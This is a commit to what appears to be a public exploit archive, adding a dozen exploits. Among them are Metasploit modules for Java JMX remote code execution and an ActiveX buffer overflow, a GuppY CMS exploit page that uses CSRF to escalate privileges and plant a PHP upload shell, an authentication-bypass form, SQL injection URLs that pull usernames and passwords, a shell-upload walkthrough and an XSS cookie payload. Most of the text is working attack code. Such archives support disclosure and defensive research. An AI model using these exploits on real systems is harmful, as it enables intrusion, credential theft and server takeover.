Update: 2015-02-19

12 new exploits
This commit is contained in:
Offensive Security 2015-02-19 08:35:26 +00:00
parent 6ed35e5963
commit 114a2afb81
13 changed files with 888 additions and 0 deletions

View file

@ -32530,3 +32530,15 @@ id,file,description,date,author,platform,type,port
36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 'research_display.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
36096,platforms/php/webapps/36096.txt,"Web Professional 'default.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
36097,platforms/php/webapps/36097.txt,"Mambo CMS N-Skyrslur Cross Site Scripting Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 & 5.00.10 Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80
36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 & 5.00.10 Multiple CSRF Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80
36100,platforms/windows/remote/36100.rb,"X360 VideoPlayer ActiveX Control Buffer Overflow",2015-02-17,metasploit,windows,remote,0
36101,platforms/java/remote/36101.rb,"Java JMX Server Insecure Configuration Java Code Execution",2015-02-17,metasploit,java,remote,1617
36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36103,platforms/php/webapps/36103.txt,"Mambo CMS AHS Shop Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36106,platforms/php/webapps/36106.txt,"Mambo CMS N-Press Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 SQL Injection and Arbitrary File Upload Vulnerabilities",2011-09-02,KedAns-Dz,php,webapps,0
36108,platforms/php/webapps/36108.txt,"Mambo CMS N-Frettir Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36109,platforms/php/webapps/36109.txt,"Mambo CMS N-Myndir Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 'calendar.php' Cross Site Scripting Vulnerability",2011-09-02,T0xic,php,webapps,0
36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 Remote Buffer Overflow Vulnerability",2011-09-05,KedAns-Dz,windows,remote,0

Can't render this file because it is too large.

369
platforms/java/remote/36101.rb Executable file
View file

@ -0,0 +1,369 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Java::Jmx
include Msf::Exploit::Remote::HttpServer
include Msf::Java::Rmi::Client
def initialize(info = {})
super(update_info(info,
'Name' => 'Java JMX Server Insecure Configuration Java Code Execution',
'Description' => %q{
This module takes advantage a Java JMX interface insecure configuration, which would
allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication
disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while
interfaces with authentication enabled will be vulnerable only if a weak configuration
is deployed (allowing to use javax.management.loading.MLet, having a security manager
allowing to load a ClassLoader MBean, etc.).
},
'Author' =>
[
'Braden Thomas', # Attack vector discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf'],
['URL', 'http://www.accuvant.com/blog/exploiting-jmx-rmi']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Privileged' => false,
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' =>
{
'WfsDelay' => 10
},
'Targets' =>
[
[ 'Generic (Java Payload)', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 22 2013'
))
register_options([
Opt::RPORT(1617)
], self.class)
end
def on_request_uri(cli, request)
if request.uri =~ /mlet$/
jar = "#{rand_text_alpha(8 + rand(8))}.jar"
mlet = "<HTML><mlet code=\"metasploit.JMXPayload\" "
mlet << "archive=\"#{jar}\" "
mlet << "name=\"#{@mlet}:name=jmxpayload,id=1\" "
mlet << "codebase=\"#{get_uri}\"></mlet></HTML>"
send_response(cli, mlet,
{
'Content-Type' => 'application/octet-stream',
'Pragma' => 'no-cache'
})
print_status("Replied to request for mlet")
elsif request.uri =~ /\.jar$/i
p = regenerate_payload(cli)
jar = p.encoded_jar
paths = [
["metasploit", "JMXPayloadMBean.class"],
["metasploit", "JMXPayload.class"],
]
jar.add_files(paths, [ Msf::Config.data_directory, "java" ])
send_response(cli, jar.pack,
{
'Content-Type' => 'application/java-archive',
'Pragma' => 'no-cache'
})
print_status("Replied to request for payload JAR")
end
end
def check
connect
unless is_rmi?
return Exploit::CheckCode::Safe
end
mbean_server = discover_endpoint
disconnect
if mbean_server.nil?
return Exploit::CheckCode::Safe
end
connect(true, { 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
unless is_rmi?
return Exploit::CheckCode::Unknown
end
jmx_endpoint = handshake(mbean_server)
disconnect
if jmx_endpoint.nil?
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Appears
end
def exploit
@mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
connect
print_status("#{peer} - Sending RMI Header...")
unless is_rmi?
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
end
print_status("#{peer} - Discoverig the JMXRMI endpoint...")
mbean_server = discover_endpoint
disconnect
if mbean_server.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
else
print_good("#{peer} - JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
end
connect(true, { 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
unless is_rmi?
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
end
print_status("#{peer} - Proceeding with handshake...")
jmx_endpoint = handshake(mbean_server)
if jmx_endpoint.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
else
print_good("#{peer} - Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
end
print_status("#{peer} - Loading payload...")
unless load_payload(jmx_endpoint)
fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
end
print_status("#{peer} - Executing payload...")
invoke_run_stream = invoke_stream(
obj_id: jmx_endpoint[:id].chop,
object: "#{@mlet}:name=jmxpayload,id=1",
method: 'run'
)
send_call(call_data: invoke_run_stream)
disconnect
end
def is_rmi?
send_header
ack = recv_protocol_ack
if ack.nil?
return false
end
true
end
def discover_endpoint
send_call(call_data: discovery_stream)
return_data = recv_return
if return_data.nil?
vprint_error("#{peer} - Discovery request didn't answer")
return nil
end
answer = extract_object(return_data, 1)
if answer.nil?
vprint_error("#{peer} - Unexpected JMXRMI discovery answer")
return nil
end
case answer
when 'javax.management.remote.rmi.RMIServerImpl_Stub'
mbean_server = extract_unicast_ref(StringIO.new(return_data.contents[2].contents))
else
vprint_error("#{peer} - JMXRMI discovery returned unexpected object #{answer}")
return nil
end
mbean_server
end
def handshake(mbean)
vprint_status("#{peer} - Sending handshake / authentication...")
send_call(call_data: handshake_stream(mbean[:id].chop))
return_data = recv_return
if return_data.nil?
vprint_error("#{peer} - Failed to send handshake")
return nil
end
answer = extract_object(return_data, 1)
if answer.nil?
vprint_error("#{peer} - Unexpected handshake answer")
return nil
end
case answer
when 'java.lang.SecurityException'
vprint_error("#{peer} - JMX end point requires authentication, but it failed")
return nil
when 'javax.management.remote.rmi.RMIConnectionImpl_Stub'
vprint_good("#{peer} - Handshake completed, proceeding...")
conn_stub = extract_unicast_ref(StringIO.new(return_data.contents[2].contents))
else
vprint_error("#{peer} - Handshake returned unexpected object #{answer}")
return nil
end
conn_stub
end
def load_payload(conn_stub)
vprint_status("#{peer} - Getting JMXPayload instance...")
get_payload_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: "#{@mlet}:name=jmxpayload,id=1")
send_call(call_data: get_payload_instance)
return_data = recv_return
if return_data.nil?
vprint_error("#{peer} - The request to getObjectInstance failed")
return false
end
answer = extract_object(return_data, 1)
if answer.nil?
vprint_error("#{peer} - Unexpected getObjectInstance answer")
return false
end
case answer
when 'javax.management.InstanceNotFoundException'
vprint_warning("#{peer} - JMXPayload instance not found, trying to load")
return load_payload_from_url(conn_stub)
when 'javax.management.ObjectInstance'
vprint_good("#{peer} - JMXPayload instance found, using it")
return true
else
vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}")
return false
end
end
def load_payload_from_url(conn_stub)
vprint_status("Starting service...")
start_service
vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...")
create_mbean = create_mbean_stream(obj_id: conn_stub[:id].chop, name: 'javax.management.loading.MLet')
send_call(call_data: create_mbean)
return_data = recv_return
if return_data.nil?
vprint_error("#{peer} - The request to createMBean failed")
return false
end
answer = extract_object(return_data, 1)
if answer.nil?
vprint_error("#{peer} - Unexpected createMBean answer")
return false
end
case answer
when 'javax.management.InstanceAlreadyExistsException'
vprint_good("#{peer} - javax.management.loading.MLet already exists")
when 'javax.management.ObjectInstance'
vprint_good("#{peer} - javax.management.loading.MLet created")
when 'java.lang.SecurityException'
vprint_error("#{peer} - The provided user hasn't enough privileges")
return false
else
vprint_error("#{peer} - createMBean returned unexpected object #{answer}")
return false
end
vprint_status("#{peer} - Getting javax.management.loading.MLet instance...")
get_mlet_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: 'DefaultDomain:type=MLet')
send_call(call_data: get_mlet_instance)
return_data = recv_return
if return_data.nil?
vprint_error("#{peer} - The request to getObjectInstance failed")
return false
end
answer = extract_object(return_data, 1)
if answer.nil?
vprint_error("#{peer} - Unexpected getObjectInstance answer")
return false
end
case answer
when 'javax.management.InstanceAlreadyExistsException'
vprint_good("#{peer} - javax.management.loading.MLet already found")
when 'javax.management.ObjectInstance'
vprint_good("#{peer} - javax.management.loading.MLet instance created")
else
vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}")
return false
end
vprint_status("#{peer} - Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...")
invoke_mlet_get_mbean_from_url = invoke_stream(
obj_id: conn_stub[:id].chop,
object: 'DefaultDomain:type=MLet',
method: 'getMBeansFromURL',
args: { 'java.lang.String' => "#{get_uri}/mlet" }
)
send_call(call_data: invoke_mlet_get_mbean_from_url)
return_data = recv_return
vprint_status("Stopping service...")
stop_service
if return_data.nil?
vprint_error("#{peer} - The call to getMBeansFromURL failed")
return false
end
answer = extract_object(return_data, 3)
if answer.nil?
vprint_error("#{peer} - Unexpected getMBeansFromURL answer")
return false
end
case answer
when 'javax.management.InstanceAlreadyExistsException'
vprint_good("#{peer} - The remote payload was already loaded... okey, using it!")
return true
when 'javax.management.ObjectInstance'
vprint_good("#{peer} - The remote payload has been loaded!")
return true
else
vprint_error("#{peer} - getMBeansFromURL returned unexpected object #{answer}")
return false
end
end
end

View file

@ -0,0 +1,60 @@
<!--
Exploit Title: GuppY CMS 5.0.9 & 5.00.10 Authentication bypass/Change email. Other versions may be vulnerable but weren't tested.
Date: 2/17/2015
Exploit Author: Brandon Murphy
Vendor Homepage: http://freeguppy.org
Software Link: Windows-5.00.10 https://www.freeguppy.org/dwnld.php?lng=en&delay=5&pg=255317&li=CeCILL
Version: 5.0.9 & 5.00.10
Tested on: Windows 7/Firefox & Xubuntu Linux 3.2.0-23-generic
Xubuntu - Guppy CMS 5.00.10 VM: http://mediafire.com/download/d85mgobb35mblzb/GUPPY5.0.7z Working on Virtualbox & VMWare Workstation - VM by d1ch4do
Username:xubuntu Pass:reverse
Timeline:
12/21/2014 Notified vendor of vulnerability.
12/21/2014 Vendor replied requesting information.
12/22/2014 Vendor notified of another vulnerability. Supplied both exploits/info.
12/23/2014 Vendor replied problem identified. I was told that I would be supplied with corrections when patch is ready.
12/23/2014 Acknowledged. Told vendor full disclosure will be released 45 days after patch release.
12/29/2014 Vendor releases 5.00.10. Countdown begins.
1/1/2015 Vendor notified the vulnerabilities still exist in patched version 5.00.10
1/2/2015 Vendor supplied with version 2 exploits.
2/17/2015 Public Disclosure. Was delayed due to holiday.
Exploit Description:
This exploit will automatically log you in and change the email to any registered user except for the admin that is installed with the web application.
Click on "Become a member" on the target website to insert the appropriate cookies for this to work.
Once the exploit takes place proceed to click "Modify" and change the password. To see if the user has some sort of admin privileges go to site.com/admin/ while still logged in. If they do it will say "Vic_username, enter your password:" and login with the password you just changed it to.
Disclaimer:
I cannot be held accountable for anything you do with this exploit. You take responsibility for your own actions. For educational and testing purposes only.
-->
<html>
<body bgcolor="#000000">
<font face="arial" color="#01DF01" size="5">
<center>
GuppY CMS 5.0.9 & 5.00.10 Authentication bypass/Change email. Other versions may be vulnerable but weren't tested.<br>
Stable with Firefox 34.0.5. Other browsers may be unstable or may not work.<br><br><br>
Thanks: Fred, d1ch4do, & to all of the people who don't believe in me.<br>
<a href="https://linkedin.com/in/brandonm86">My LinkedIn</a><br>-----------------------------------------------------------------------------------</font>
<body>
<form action="http://website.com/user.php?lng=en" method="POST"> <!-- Change this action to http://website.com/user.php?lng=en&uuser=new to work with 5.00.10. -->
<input type="hidden" name="token" value="131095497e5f9d22882.83937400"/> <!-- Click on become a member. View the source then search for "token" and replace this value. Remove this line to work with 5.00.10 -->
<input type="hidden" name="setusercookie" value="1"/>
<input type="hidden" name="uuser" value="update"/> <!-- Wet paint. Don't touch! -->
<input type="hidden" name="code_pseudo" value=""/>
<input type="text" name="upseudo" value="Vic Username"/><br><br> <!-- User to login as. Can be any registered user with(out) special privileges. -->
<input type="text" name="uuid" value="Password"/><br><br> <!-- Anything you like as you will change the password to what you want after the exploit succeeds. -->
<input type="text" name="uuid2" value="Verify Password"/><br><br>
<input type="text" name="uemail" value="Your Email"/><br><br><br> <!-- Email will be changed to the one you provide. -->
<input type="hidden" name="uwebsite" value="http://"/>
<input type="hidden" name="usign" value=""/>
<input type="hidden" name="uimgsign" value="http://"/>
<input type="hidden" name="ulang" value="en"/>
<input type="hidden" name="udesign" value=""/>
<input type="hidden" name="uboxes" value="LR"/>
<input type="hidden" name="uextavatar" value="http://"/>
<input type="submit" value="Enjoy the ride!"/></center>
</form>
</body>
</html>

View file

@ -0,0 +1,80 @@
<!--
Exploit Title: GuppY CMS 5.0.9 & 5.00.10 Multiple CSRF Vulnerabilities-Privilege escalation/File upload. Other versions may be vulnerable but weren't tested.
Date: 2/17/2015
Exploit Author: Brandon Murphy
Vendor Homepage: http://freeguppy.org
Software Link: Windows-5.00.10 https://www.freeguppy.org/dwnld.php?lng=en&delay=5&pg=255317&li=CeCILL
Version: 5.0.9 & 5.00.10
Tested on: Windows 7/Firefox & Xubuntu Linux 3.2.0-23-generic
Xubuntu - Guppy CMS 5.00.10 VM: http://mediafire.com/download/d85mgobb35mblzb/GUPPY5.0.7z Working on Virtualbox & VMWare Workstation - VM by d1ch4do
Username:xubuntu Pass:reverse
Timeline:
12/21/2014 Notified vendor of vulnerability.
12/21/2014 Vendor replied requesting information.
12/22/2014 Vendor notified of another vulnerability. Supplied both exploits/info.
12/23/2014 Vendor replied problem identified. I was told that I would be supplied with corrections when patch is ready.
12/23/2014 Acknowledged. Told vendor full disclosure will be released 45 days after patch release.
12/29/2014 Vendor releases 5.00.10. Countdown begins.
1/1/2015 Vendor notified the vulnerabilities still exist in patched version 5.00.10
1/2/2015 Vendor supplied with version 2 exploits.
2/17/2015 Public Disclosure. Was delayed due to holiday.
Exploit Description:
Stable with Firefox 34.0.5. Other browsers may be unstable or may not work. When an authenticated admin is exposed to the code below it will do a couple things. "CSRF 1" allows a registered user to escalate their privileges to Collaborator Admin with access to the "files" plugin. This will allow the attacker to upload a php shell to compromise the server. Once executed the attacker would log into the website as normal then proceed to site.com/admin where it greets them with "AttackerName, enter your password :" and login with the same password you registered with. Hover over "General Management" and then click "Files" where the you can upload a shell of your choosing.
"CSRF 2" As stated earlier the admin has to be authenticated for this to work. However, the attacker doesn't need an account for "CSRF 2" to work. If the attacker does have an account "CSRF 1" and "CSRF 2" are both automatically executed when the page is loaded giving them 2 ways in. All that is needed on the attacker's end is to go to site.com/file/up.php, upload your shell and access it at site.com/file/shell_name.php The admin must have access to the "files" plugin.
Thanks: Fred, d1ch4do, & to all of the people who don't believe in me.
My LinkedIn: https://linkedin.com/in/brandonm86
Disclaimer:
I cannot be held accountable for anything you do with this exploit. You take responsibility for your own actions. For educational and testing purposes only.
-->
<!-- CSRF 1 start - Escalate attacker privileges to Collaborator Admin with the ability to upload unrestricted files (A shell). -->
<html>
<body onload="document.forms[0].submit(); redirect(); submitRequest()">
<form action="http://site.com/admin/admin.php?lng=en&pg=attribdroits" method="POST">
<input type="hidden" name="namedroits" value="TestUser"/> <!-- Attacker user name. You must register this user first! -->
<input type="hidden" name="etape" value="3"/>
<input type="hidden" name="drtuser38" value="5f4dcc3b5aa765d61d8327deb882cf99"/> <!-- Attacker password md5 hash. -->
<input type="hidden" name="drtuser42" value="admin"/> <!-- Your rights to be granted. Leave me alone! -->
<input type="hidden" name="drtuser30" value=""/>
<input type="hidden" name="drtuser36" value="on"/>
<input type="hidden" name="listplug" value="files"/> <!-- The plugin you will grant yourself access to. -->
</form>
<script>
function redirect(){
window.location.href = "http://site.com/index.php"; <!-- Redirect admin to somewhere else after the CSRF takes place or he/she would know the jig is up. -->
}
<!-- End CSRF 1 -->
<!-- CSRF 2 start - Uploads a small upload script that can then be used to upload your favorite shell. Go to site.com/file/up.php then upload your shell. -->
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://site.com/admin/admin.php?lng=en&pg=upload", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------221361792726389");
xhr.withCredentials = true;
var body = "-----------------------------221361792726389\r\n" +
"Content-Disposition: form-data; name=\"rep\"\r\n" +
"\r\n" +
"file\r\n" +
"-----------------------------221361792726389\r\n" +
"Content-Disposition: form-data; name=\"ficup\"; filename=\"up.php\"\r\n" + <!-- Name your php upload script here. -->
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3cform method=\"post\" action=\"\" enctype=\"multipart/form-data\"\x3e\x3cinput type=\"file\" name=\"myfile\"\x3e\x3cinput type=\"submit\" value=\"Upload\"\x3e\x3c/form\x3e\x3c?PHP $dir = \"./\"; $path = $_FILES[\"myfile\"][\"tmp_name\"]; $name = $_FILES[\"myfile\"][\"name\"];if (move_uploaded_file($path, $dir . $name)){print \"file uploaded. You made it\";} else {print \"Error! No hacking today!\";} ?\x3e\r\n" +
"-----------------------------221361792726389--\r\n"; <!-- Upload script by d1ch4do -->
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<!-- Ending CSRF -->
</body>
</html>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49418/info
The Mambo CMS N-Gallery component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[PATH]/index.php?option=com_n-gallery&Itemid=-0&flokkur=23 union select 0 from mos_users--

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49419/info
The Mambo CMS AHS Shop component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[PATH]/index.php?option=com_ahsshop&flokkur=-294 union select 0,username,password,3,4,5,6,7,8,9 from mos_users

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49420/info
The Mambo CMS N-Press component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[PATH]/index.php?option=com_n-press&press=10 union select 0,username,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from mos_users

37
platforms/php/webapps/36107.txt Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/49421/info
KaiBB is prone to multiple SQL-injection vulnerabilities and a arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
KaiBB 2.0.1 is vulnerable; other versions may also be affected.
<+> 1 / * Multiple SQL Inj3cti0n :
http://127.0.0.1/kaibb/?s=viewtopic&t='
http://127.0.0.1/kaibb/?s=viewtopic&t=1'
http://[target]/[path]/?s=viewtopic&t=[SQLi]
------------------------------------------------
http://127.0.0.1/kaibb/?s=viewforum&f='
http://127.0.0.1/kaibb/?s=viewforum&f=1'
http://[target]/[path]/?s=viewforum&f=[SQLi]
------------------------------------------------
http://127.0.0.1/kaibb/?s=profile&user='
http://127.0.0.1/kaibb/?s=profile&user=2'
http://[target]/[path]/?s=profile&user=[SQLi]
------------------------------------------------
http://127.0.0.1/kaibb/?s=search&mode=search&term=&page='
http://127.0.0.1/kaibb/?s=search&mode=search&term=&page=1'
http://[target]/[path]/?s=search&mode=search&term=&page=1'[SQLi]
------------------------------------------------
<+> 2 / * File|Sh3lL Upload :
http://127.0.0.1/kaibb/?s=ucp&mode=avatar
+ After register go t0 :
http://[target]/[path]/?s=ucp&mode=avatar
+ Upload Sh3ll.php.gif ....
- Find him on : http://127.0.0.1/kaibb/img/avatars/{UserID}.gif
fr0m eXample : {UserID} = 2 :
+ http://127.0.0.1/kaibb/img/avatars/2.gif

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49422/info
The Mambo CMS N-Frettir component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[PATH]/index.php?option=com_n-frettir&do=view&Itemid=81&id=-54 union select 0,username,2,password,4,5,6,7,8,9,10 from mos_users

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49424/info
The Mambo CMS N-Myndir component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[PATH]/index.php?option=com_n-myndir&flokkur=-16 union select username from mos_users

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49442/info
ACal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
ACal 2.2.6 is vulnerable; other versions may also be affected.
http://www.example.com/calendar/calendar.php?year=<script>alert(document.cookie)</script>

143
platforms/windows/remote/36100.rb Executable file
View file

@ -0,0 +1,143 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the
X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun
a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Rh0', # vulnerability discovery and exploit, all the hard work
'juan vazquez' # msf module
],
'References' =>
[
['EDB', '35948'],
['URL', 'https://rh0dev.github.io/blog/2015/fun-with-info-leaks/']
],
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'PrependEncoder' => stack_adjust
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{4B3476C6-185A-4D19-BB09-718B565FA67B}",
:os_name => OperatingSystems::Match::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:ua_ver => '10.0'
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Jan 30 2015",
'DefaultTarget' => 0))
end
def stack_adjust
adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb
adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
adjust
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
case request.uri
when /exploit.js/
print_status("Sending exploit.js...")
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
send_exploit_html(cli, exploit_template(cli, target_info), headers)
when /sprayer.js/
print_status("Sending sprayer.js...")
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
send_exploit_html(cli, sprayer_template(cli, target_info), headers)
when /informer.js/
print_status("Sending informer.js...")
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
send_exploit_html(cli, informer_template(cli, target_info), headers)
when /rop_builder.js/
print_status("Sending rop_builder.js...")
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
send_exploit_html(cli, rop_builder_template(cli, target_info), headers)
else
print_status("Sending main.html...")
headers = {'Pragma' => 'no-cache', 'Content-Type'=>'text/html'}
send_exploit_html(cli, main_template(cli, target_info), headers)
end
end
def main_template(cli, target_info)
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html')
template = ''
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
return template, binding()
end
def exploit_template(cli, target_info)
shellcode = Rex::Text.to_hex(get_payload(cli, target_info))
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js')
template = ''
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
return template, binding()
end
def sprayer_template(cli, target_info)
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js')
template = ''
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
return template, binding()
end
def informer_template(cli, target_info)
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js')
template = ''
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
return template, binding()
end
def rop_builder_template(cli, target_info)
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js')
template = ''
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
return template, binding()
end
def strip_comments(input)
input.gsub(/\/\/.*$/, '')
end
end

143
platforms/windows/remote/36111.py Executable file
View file

@ -0,0 +1,143 @@
source: http://www.securityfocus.com/bid/49444/info
Cerberus FTP Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition.
Cerberus FTP Server 4.0.9.8 is vulnerable; other versions may also be affected.
NOTE: The vendor refutes this issue stating the issue can not be replicated as described.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com
# Facebook : http://facebook.com/KedAns
# platform : windows
# Impact : Remote Buffer Overflow ( in REST command)
# Tested on : Windows XP SP3 (en)
##
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG |
# | ------------------------------------------------- < |
###
#=====[ Exploit Code ]======>
